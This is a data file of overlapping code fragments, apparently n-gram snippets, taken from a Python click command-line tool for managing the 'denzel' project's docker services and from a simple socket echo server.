\"\"\"Connect to service bash shell\"\"\" commands.shell(service) # --------", "-------- updatepipreqs -------- @cli.command() def updatepipreqs(): \"\"\"Update services according to requirements.txt\"\"\" commands.updatepipreqs() #", "# -------- start -------- @cli.command() def start(): \"\"\"Start services\"\"\" commands.start() # -------- stop", "\"\"\"Update services according to requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs -------- @cli.command() def updatereqs():", "default=False, help=\"Discard the docker images\", show_default=True) def shutdown(purge): \"\"\"Stops and deletes all services\"\"\"", "commands.updateosreqs() # -------- updatepipreqs -------- @cli.command() def updatepipreqs(): \"\"\"Update services according to requirements.txt\"\"\"", "@click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True) def shell(service): \"\"\"Connect to service bash shell\"\"\"", "\"\"\"Builds and starts all services\"\"\" commands.launch(api_port, monitor_port) # -------- shutdown -------- @cli.command() @click.option('--purge/--no-purge',", "for NVIDIA GPU\", show_default=True) def startproject(name, gpu): \"\"\"Builds the denzel project skeleton\"\"\" commands.create_project(project_name=name,", "commands.stop() # -------- restart -------- @cli.command() def restart(): \"\"\"Restart services\"\"\" commands.restart() # --------", "commands from requirements.sh on all services\"\"\" commands.updateosreqs() # -------- updatepipreqs -------- @cli.command() def", "startproject(name, gpu): \"\"\"Builds the denzel project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) # -------- launch --------", "and worker\"\"\" commands.status(live) # -------- updateosreqs -------- @cli.command() def updateosreqs(): \"\"\"Run shell commands", "services\"\"\" commands.launch(api_port, monitor_port) # -------- shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the docker", "@click.option('--live/--no-live', default=False, help='Live status view', show_default=True) def status(live): \"\"\"Examine status of services and", "updateosreqs(): \"\"\"Run shell commands from requirements.sh on all services\"\"\" commands.updateosreqs() # -------- updatepipreqs", "requirements.sh on all services\"\"\" commands.updateosreqs() # -------- updatepipreqs -------- @cli.command() def updatepipreqs(): \"\"\"Update", "@click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']), help='Target service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs output',", "shutdown(purge): \"\"\"Stops and deletes all services\"\"\" commands.shutdown(purge) # -------- start -------- @cli.command() def", "-------- start -------- @cli.command() def start(): \"\"\"Start services\"\"\" commands.start() # -------- stop --------", "@cli.command() def start(): \"\"\"Start services\"\"\" commands.start() # -------- stop -------- @cli.command() def stop():", "+ ['all']), help='Target service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logs(service,", "default=False, help='Live status view', show_default=True) def status(live): \"\"\"Examine status of services and worker\"\"\"", "help='Responses synchronicity') @click.option('--timeout', default=5., type=float, show_default=True, help='Sync response timeout in seconds') def response(sync,", "manner (sync/async) and sync timeout\"\"\" if sync is None: raise click.ClickException('Must pass --sync", "sync is None: raise click.ClickException('Must pass --sync or --async') if sync and timeout", "shell commands from requirements.sh on all services\"\"\" commands.updateosreqs() # -------- updatepipreqs -------- @cli.command()", "# -------- response -------- @cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses synchronicity') @click.option('--timeout', default=5., type=float,", "starts all services\"\"\" commands.launch(api_port, monitor_port) # -------- shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard", "\"\"\"Run shell commands from requirements.sh on all services\"\"\" commands.updateosreqs() # -------- updatepipreqs --------", "if sync and timeout <= 0: raise click.ClickException('Sync timeout must be greater than", "port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\", show_default=True) def launch(api_port, monitor_port): \"\"\"Builds", "commands from .. import config import click @click.group() def cli(): pass # --------", "-------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the docker images\", show_default=True) def shutdown(purge): \"\"\"Stops and", "from .. import config import click @click.group() def cli(): pass # -------- startproject", "timeout\"\"\" if sync is None: raise click.ClickException('Must pass --sync or --async') if sync", "of services and worker\"\"\" commands.status(live) # -------- updateosreqs -------- @cli.command() def updateosreqs(): \"\"\"Run", "# -------- updatepipreqs -------- @cli.command() def updatepipreqs(): \"\"\"Update services according to requirements.txt\"\"\" commands.updatepipreqs()", "# -------- updateosreqs -------- @cli.command() def updateosreqs(): \"\"\"Run shell commands from requirements.sh on", "shell(service): \"\"\"Connect to service bash shell\"\"\" commands.shell(service) # -------- response -------- @cli.command() @click.option('--sync/--async',", "service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logs(service, live): \"\"\"Show service", "status of services and worker\"\"\" commands.status(live) # -------- updateosreqs -------- @cli.command() def updateosreqs():", "# -------- shell -------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True) def shell(service):", "-------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logworker(live): \"\"\"Show worker log\"\"\"", "@click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA GPU\", show_default=True) def startproject(name, gpu): \"\"\"Builds", "# -------- startproject -------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA GPU\",", "stop -------- @cli.command() def stop(): \"\"\"Stop services\"\"\" commands.stop() # -------- restart -------- @cli.command()", "default=False, help='Follow logs output', show_default=True) def logworker(live): \"\"\"Show worker log\"\"\" commands.logworker(live) # --------", "images\", show_default=True) def shutdown(purge): \"\"\"Stops and deletes all services\"\"\" commands.shutdown(purge) # -------- start", "commands.logworker(live) # -------- shell -------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True) def", "skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) # -------- launch -------- @cli.command() @click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints", "def shutdown(purge): \"\"\"Stops and deletes all services\"\"\" commands.shutdown(purge) # -------- start -------- @cli.command()", "-------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']), help='Target service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow", "status -------- @cli.command() @click.option('--live/--no-live', default=False, help='Live status view', show_default=True) def status(live): \"\"\"Examine status", "@click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logs(service, live): \"\"\"Show service logs\"\"\" commands.logs(service,", "@cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA GPU\", show_default=True) def startproject(name, gpu):", "logworker(live): \"\"\"Show worker log\"\"\" commands.logworker(live) # -------- shell -------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES),", "@click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\", show_default=True) def launch(api_port, monitor_port): \"\"\"Builds and starts", "-------- logworker -------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logworker(live): \"\"\"Show", "def cli(): pass # -------- startproject -------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support", "launch -------- @cli.command() @click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int,", "type=int, help=\"Monitor UI port\", show_default=True) def launch(api_port, monitor_port): \"\"\"Builds and starts all services\"\"\"", "help='Live status view', show_default=True) def status(live): \"\"\"Examine status of services and worker\"\"\" commands.status(live)", "-------- @cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses synchronicity') @click.option('--timeout', default=5., type=float, show_default=True, help='Sync response", "def response(sync, timeout): \"\"\"Set response manner (sync/async) and sync timeout\"\"\" if sync is", "-------- @cli.command() @click.option('--live/--no-live', default=False, help='Live status view', show_default=True) def status(live): \"\"\"Examine status of", "\"\"\"Update services using requirements.txt and requirements.sh\"\"\" commands.updatereqs() # -------- logs -------- @cli.command() @click.option('--service',", "def logs(service, live): \"\"\"Show service logs\"\"\" commands.logs(service, live) # -------- logworker -------- @cli.command()", "default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\", show_default=True) def launch(api_port, monitor_port): \"\"\"Builds and starts all", "on all services\"\"\" commands.updateosreqs() # -------- updatepipreqs -------- @cli.command() def updatepipreqs(): \"\"\"Update services", "@cli.command() @click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI", "or --async') if sync and timeout <= 0: raise click.ClickException('Sync timeout must be", "@click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA GPU\", show_default=True) def startproject(name, gpu): \"\"\"Builds the denzel", "all services\"\"\" commands.launch(api_port, monitor_port) # -------- shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the", "-------- @cli.command() def start(): \"\"\"Start services\"\"\" commands.start() # -------- stop -------- @cli.command() def", "@cli.command() def stop(): \"\"\"Stop services\"\"\" commands.stop() # -------- restart -------- @cli.command() def restart():", "cli(): pass # -------- startproject -------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support for", "all services\"\"\" commands.updateosreqs() # -------- updatepipreqs -------- @cli.command() def updatepipreqs(): \"\"\"Update services according", "commands.status(live) # -------- updateosreqs -------- @cli.command() def updateosreqs(): \"\"\"Run shell commands from requirements.sh", "@click.option('--sync/--async', required=True, default=True, help='Responses synchronicity') @click.option('--timeout', default=5., type=float, show_default=True, help='Sync response timeout in", "live): \"\"\"Show service logs\"\"\" commands.logs(service, live) # -------- logworker -------- @cli.command() @click.option('--live/--no-live', default=False,", "worker\"\"\" commands.status(live) # -------- updateosreqs -------- @cli.command() def updateosreqs(): \"\"\"Run shell commands from", "commands.updatereqs() # -------- logs -------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']), help='Target service',", "@cli.command() @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logworker(live): \"\"\"Show worker log\"\"\" commands.logworker(live)", "output', show_default=True) def logworker(live): \"\"\"Show worker log\"\"\" commands.logworker(live) # -------- shell -------- @cli.command()", "@click.option('--purge/--no-purge', default=False, help=\"Discard the docker images\", show_default=True) def shutdown(purge): \"\"\"Stops and deletes all", "-------- shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the docker images\", show_default=True) def shutdown(purge):", "-------- @cli.command() def updateosreqs(): \"\"\"Run shell commands from requirements.sh on all services\"\"\" commands.updateosreqs()", "worker log\"\"\" commands.logworker(live) # -------- shell -------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service',", "requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs -------- @cli.command() def updatereqs(): \"\"\"Update services using requirements.txt", "click.ClickException('Must pass --sync or --async') if sync and timeout <= 0: raise click.ClickException('Sync", "type=click.Choice(config.SERVICES), help='Target service', show_default=True) def shell(service): \"\"\"Connect to service bash shell\"\"\" commands.shell(service) #", "help=\"Discard the docker images\", show_default=True) def shutdown(purge): \"\"\"Stops and deletes all services\"\"\" commands.shutdown(purge)", "commands.logs(service, live) # -------- logworker -------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True)", "def startproject(name, gpu): \"\"\"Builds the denzel project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) # -------- launch", "@cli.command() def updateosreqs(): \"\"\"Run shell commands from requirements.sh on all services\"\"\" commands.updateosreqs() #", "required=True, default=True, help='Responses synchronicity') @click.option('--timeout', default=5., type=float, show_default=True, help='Sync response timeout in seconds')", "-------- response -------- @cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses synchronicity') @click.option('--timeout', default=5., type=float, show_default=True,", "services using requirements.txt and requirements.sh\"\"\" commands.updatereqs() # -------- logs -------- @cli.command() @click.option('--service', default='all',", "# -------- logs -------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']), help='Target service', show_default=True)", "response timeout in seconds') def response(sync, timeout): \"\"\"Set response manner (sync/async) and sync", "def start(): \"\"\"Start services\"\"\" commands.start() # -------- stop -------- @cli.command() def stop(): \"\"\"Stop", "commands.start() # -------- stop -------- @cli.command() def stop(): \"\"\"Stop services\"\"\" commands.stop() # --------", "@click.group() def cli(): pass # -------- startproject -------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False,", "logs output', show_default=True) def logs(service, live): \"\"\"Show service logs\"\"\" commands.logs(service, live) # --------", "requirements.sh\"\"\" commands.updatereqs() # -------- logs -------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']), help='Target", "-------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA GPU\", show_default=True) def startproject(name,", "-------- @cli.command() def updatereqs(): \"\"\"Update services using requirements.txt and requirements.sh\"\"\" commands.updatereqs() # --------", "seconds') def response(sync, timeout): \"\"\"Set response manner (sync/async) and sync timeout\"\"\" if sync", "def updatepipreqs(): \"\"\"Update services according to requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs -------- @cli.command()", "type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA GPU\", show_default=True) def startproject(name, gpu): \"\"\"Builds the", "logs(service, live): \"\"\"Show service logs\"\"\" commands.logs(service, live) # -------- logworker -------- @cli.command() @click.option('--live/--no-live',", "in seconds') def response(sync, timeout): \"\"\"Set response manner (sync/async) and sync timeout\"\"\" if", "response manner (sync/async) and sync timeout\"\"\" if sync is None: raise click.ClickException('Must pass", "monitor_port) # -------- shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the docker images\", show_default=True)", "default=config.API_PORT, type=int, help=\"API endpoints port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\", show_default=True)", "show_default=True) def shell(service): \"\"\"Connect to service bash shell\"\"\" commands.shell(service) # -------- response --------", "services and worker\"\"\" commands.status(live) # -------- updateosreqs -------- @cli.command() def updateosreqs(): \"\"\"Run shell", "@cli.command() def updatepipreqs(): \"\"\"Update services according to requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs --------", "default=False, help='Follow logs output', show_default=True) def logs(service, live): \"\"\"Show service logs\"\"\" commands.logs(service, live)", "help=\"API endpoints port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\", show_default=True) def launch(api_port,", ".. import config import click @click.group() def cli(): pass # -------- startproject --------", "# -------- launch -------- @cli.command() @click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints port\", show_default=True) @click.option('--monitor-port',", "services\"\"\" commands.restart() # -------- status -------- @cli.command() @click.option('--live/--no-live', default=False, help='Live status view', show_default=True)", "response -------- @cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses synchronicity') @click.option('--timeout', default=5., type=float, show_default=True, help='Sync", "-------- @cli.command() def updatepipreqs(): \"\"\"Update services according to requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs", "if sync is None: raise click.ClickException('Must pass --sync or --async') if sync and", "default=False, help=\"Support for NVIDIA GPU\", show_default=True) def startproject(name, gpu): \"\"\"Builds the denzel project", "<reponame>eliorc/denzel from .. import commands from .. import config import click @click.group() def", "\"\"\"Restart services\"\"\" commands.restart() # -------- status -------- @cli.command() @click.option('--live/--no-live', default=False, help='Live status view',", "import commands from .. import config import click @click.group() def cli(): pass #", "default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True) def shell(service): \"\"\"Connect to service bash shell\"\"\" commands.shell(service)", "\"\"\"Show service logs\"\"\" commands.logs(service, live) # -------- logworker -------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow", "shell\"\"\" commands.shell(service) # -------- response -------- @cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses synchronicity') @click.option('--timeout',", "and sync timeout\"\"\" if sync is None: raise click.ClickException('Must pass --sync or --async')", "-------- shell -------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True) def shell(service): \"\"\"Connect", "response(sync, timeout): \"\"\"Set response manner (sync/async) and sync timeout\"\"\" if sync is None:", "import config import click @click.group() def cli(): pass # -------- startproject -------- @cli.command()", "all services\"\"\" commands.shutdown(purge) # -------- start -------- @cli.command() def start(): \"\"\"Start services\"\"\" commands.start()", "updatepipreqs -------- @cli.command() def updatepipreqs(): \"\"\"Update services according to requirements.txt\"\"\" commands.updatepipreqs() # --------", "\"\"\"Examine status of services and worker\"\"\" commands.status(live) # -------- updateosreqs -------- @cli.command() def", "def updateosreqs(): \"\"\"Run shell commands from requirements.sh on all services\"\"\" commands.updateosreqs() # --------", "def shell(service): \"\"\"Connect to service bash shell\"\"\" commands.shell(service) # -------- response -------- @cli.command()", "\"\"\"Connect to service bash shell\"\"\" commands.shell(service) # -------- response -------- @cli.command() @click.option('--sync/--async', required=True,", "@click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\",", "-------- @cli.command() @click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor", "services\"\"\" commands.updateosreqs() # -------- updatepipreqs -------- @cli.command() def updatepipreqs(): \"\"\"Update services according to", "synchronicity') @click.option('--timeout', default=5., type=float, show_default=True, help='Sync response timeout in seconds') def response(sync, timeout):", "restart -------- @cli.command() def restart(): \"\"\"Restart services\"\"\" commands.restart() # -------- status -------- @cli.command()", "updatereqs(): \"\"\"Update services using requirements.txt and requirements.sh\"\"\" commands.updatereqs() # -------- logs -------- @cli.command()", "timeout in seconds') def response(sync, timeout): \"\"\"Set response manner (sync/async) and sync timeout\"\"\"", "NVIDIA GPU\", show_default=True) def startproject(name, gpu): \"\"\"Builds the denzel project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu)", "-------- status -------- @cli.command() @click.option('--live/--no-live', default=False, help='Live status view', show_default=True) def status(live): \"\"\"Examine", "help='Target service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logs(service, live): \"\"\"Show", "according to requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs -------- @cli.command() def updatereqs(): \"\"\"Update services", "endpoints port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\", show_default=True) def launch(api_port, monitor_port):", "config import click @click.group() def cli(): pass # -------- startproject -------- @cli.command() @click.argument('name',", "denzel project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) # -------- launch -------- @cli.command() @click.option('--api-port', default=config.API_PORT, type=int,", "show_default=True) def launch(api_port, monitor_port): \"\"\"Builds and starts all services\"\"\" commands.launch(api_port, monitor_port) # --------", "def stop(): \"\"\"Stop services\"\"\" commands.stop() # -------- restart -------- @cli.command() def restart(): \"\"\"Restart", "type=click.Choice(config.SERVICES + ['all']), help='Target service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def", "port\", show_default=True) def launch(api_port, monitor_port): \"\"\"Builds and starts all services\"\"\" commands.launch(api_port, monitor_port) #", "to service bash shell\"\"\" commands.shell(service) # -------- response -------- @cli.command() @click.option('--sync/--async', required=True, default=True,", "default='all', type=click.Choice(config.SERVICES + ['all']), help='Target service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True)", "service bash shell\"\"\" commands.shell(service) # -------- response -------- @cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses", "requirements.txt and requirements.sh\"\"\" commands.updatereqs() # -------- logs -------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES +", "live) # -------- logworker -------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def", "-------- startproject -------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA GPU\", show_default=True)", "\"\"\"Stop services\"\"\" commands.stop() # -------- restart -------- @cli.command() def restart(): \"\"\"Restart services\"\"\" commands.restart()", "show_default=True) def startproject(name, gpu): \"\"\"Builds the denzel project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) # --------", "and deletes all services\"\"\" commands.shutdown(purge) # -------- start -------- @cli.command() def start(): \"\"\"Start", "-------- updateosreqs -------- @cli.command() def updateosreqs(): \"\"\"Run shell commands from requirements.sh on all", "from .. import commands from .. import config import click @click.group() def cli():", "stop(): \"\"\"Stop services\"\"\" commands.stop() # -------- restart -------- @cli.command() def restart(): \"\"\"Restart services\"\"\"", "status(live): \"\"\"Examine status of services and worker\"\"\" commands.status(live) # -------- updateosreqs -------- @cli.command()", "show_default=True, help='Sync response timeout in seconds') def response(sync, timeout): \"\"\"Set response manner (sync/async)", "the docker images\", show_default=True) def shutdown(purge): \"\"\"Stops and deletes all services\"\"\" commands.shutdown(purge) #", "timeout): \"\"\"Set response manner (sync/async) and sync timeout\"\"\" if sync is None: raise", "\"\"\"Start services\"\"\" commands.start() # -------- stop -------- @cli.command() def stop(): \"\"\"Stop services\"\"\" commands.stop()", "restart(): \"\"\"Restart services\"\"\" commands.restart() # -------- status -------- @cli.command() @click.option('--live/--no-live', default=False, help='Live status", "commands.launch(api_port, monitor_port) # -------- shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the docker images\",", "\"\"\"Stops and deletes all services\"\"\" commands.shutdown(purge) # -------- start -------- @cli.command() def start():", "gpu): \"\"\"Builds the denzel project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) # -------- launch -------- @cli.command()", "show_default=True) def logworker(live): \"\"\"Show worker log\"\"\" commands.logworker(live) # -------- shell -------- @cli.command() @click.option('--service',", "@cli.command() def restart(): \"\"\"Restart services\"\"\" commands.restart() # -------- status -------- @cli.command() @click.option('--live/--no-live', default=False,", "show_default=True) def status(live): \"\"\"Examine status of services and worker\"\"\" commands.status(live) # -------- updateosreqs", "commands.create_project(project_name=name, use_gpu=gpu) # -------- launch -------- @cli.command() @click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints port\",", "UI port\", show_default=True) def launch(api_port, monitor_port): \"\"\"Builds and starts all services\"\"\" commands.launch(api_port, monitor_port)", "service logs\"\"\" commands.logs(service, live) # -------- logworker -------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow logs", "@cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the docker images\", show_default=True) def shutdown(purge): \"\"\"Stops and deletes", "sync and timeout <= 0: raise click.ClickException('Sync timeout must be greater than 0')", "def logworker(live): \"\"\"Show worker log\"\"\" commands.logworker(live) # -------- shell -------- @cli.command() @click.option('--service', default='denzel',", "and timeout <= 0: raise click.ClickException('Sync timeout must be greater than 0') commands.response(sync," ]
[ "on 2020-04-18 20:25 from django.db import migrations, models class Migration(migrations.Migration): initial = True", "[ migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname', models.CharField(max_length=50)), ('api_key', models.CharField(max_length=128)), ('panorama',", "# Generated by Django 3.0.5 on 2020-04-18 20:25 from django.db import migrations, models", "name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname', models.CharField(max_length=50)), ('api_key', models.CharField(max_length=128)), ('panorama', models.BooleanField()), ],", "= [ ] operations = [ migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)),", "3.0.5 on 2020-04-18 20:25 from django.db import migrations, models class Migration(migrations.Migration): initial =", "operations = [ migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname', models.CharField(max_length=50)), ('api_key',", "<reponame>rodvand/netbox-paloalto<gh_stars>10-100 # Generated by Django 3.0.5 on 2020-04-18 20:25 from django.db import migrations,", "[ ] operations = [ migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname',", "migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname', models.CharField(max_length=50)), ('api_key', models.CharField(max_length=128)), ('panorama', models.BooleanField()),", "= [ migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname', models.CharField(max_length=50)), ('api_key', models.CharField(max_length=128)),", "by Django 3.0.5 on 2020-04-18 20:25 from django.db import migrations, models class Migration(migrations.Migration):", "django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ]", "True dependencies = [ ] operations = [ migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True,", "('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname', models.CharField(max_length=50)), ('api_key', models.CharField(max_length=128)), ('panorama', models.BooleanField()), ], ), ]", "Django 3.0.5 on 2020-04-18 20:25 from django.db import migrations, models class Migration(migrations.Migration): initial", "20:25 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies =", "from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [", "] operations = [ migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname', models.CharField(max_length=50)),", "models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [", "migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations =", "class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel(", "Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='FirewallConfig',", "initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='FirewallConfig', fields=[", "= True dependencies = [ ] operations = [ migrations.CreateModel( name='FirewallConfig', fields=[ ('id',", "dependencies = [ ] operations = [ migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True,", "import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations", "fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname', models.CharField(max_length=50)), ('api_key', models.CharField(max_length=128)), ('panorama', models.BooleanField()), ], ),", "Generated by Django 3.0.5 on 2020-04-18 20:25 from django.db import migrations, models class", "2020-04-18 20:25 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies" ]
[ "<gh_stars>0 import socket host = '' port = 12345 addr = (host, port)", "except KeyboardInterrupt: break print('Hello,', cli_addr) while True: data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if", "'quit': break print(data) sdata = input('> ') + '\\r\\n' cli_sock.send(sdata.encode()) # 将str编码为bytes cli_sock.close()", "break print('Hello,', cli_addr) while True: data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if data.strip() ==", "try: cli_sock, cli_addr = s.accept() except KeyboardInterrupt: break print('Hello,', cli_addr) while True: data", "(host, port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1) while True: try:", "port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1) while True: try: cli_sock,", "= s.accept() except KeyboardInterrupt: break print('Hello,', cli_addr) while True: data = cli_sock.recv(1024).decode() #", "socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1) while True: try: cli_sock, cli_addr = s.accept()", "socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1) while True: try: cli_sock, cli_addr = s.accept() except KeyboardInterrupt:", "print('Hello,', cli_addr) while True: data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if data.strip() == 'quit':", "12345 addr = (host, port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1)", "1) s.bind(addr) s.listen(1) while True: try: cli_sock, cli_addr = s.accept() except KeyboardInterrupt: break", "s.listen(1) while True: try: cli_sock, cli_addr = s.accept() except KeyboardInterrupt: break print('Hello,', cli_addr)", "while True: try: cli_sock, cli_addr = s.accept() except KeyboardInterrupt: break print('Hello,', cli_addr) while", "把bytes类型解码为str类型 if data.strip() == 'quit': break print(data) sdata = input('> ') + '\\r\\n'", "= socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1) while True: try: cli_sock, cli_addr =", "s.bind(addr) s.listen(1) while True: try: cli_sock, cli_addr = s.accept() except KeyboardInterrupt: break print('Hello,',", "cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if data.strip() == 'quit': break print(data) sdata = input('> ')", "socket host = '' port = 12345 addr = (host, port) s =", "host = '' port = 12345 addr = (host, port) s = socket.socket()", "= 12345 addr = (host, port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr)", "data.strip() == 'quit': break print(data) sdata = input('> ') + '\\r\\n' cli_sock.send(sdata.encode()) #", "s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1) while True: try: cli_sock, cli_addr = s.accept() except", "break print(data) sdata = input('> ') + '\\r\\n' cli_sock.send(sdata.encode()) # 将str编码为bytes cli_sock.close() s.close()", "= (host, port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1) while True:", "import socket host = '' port = 12345 addr = (host, port) s", "s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr) 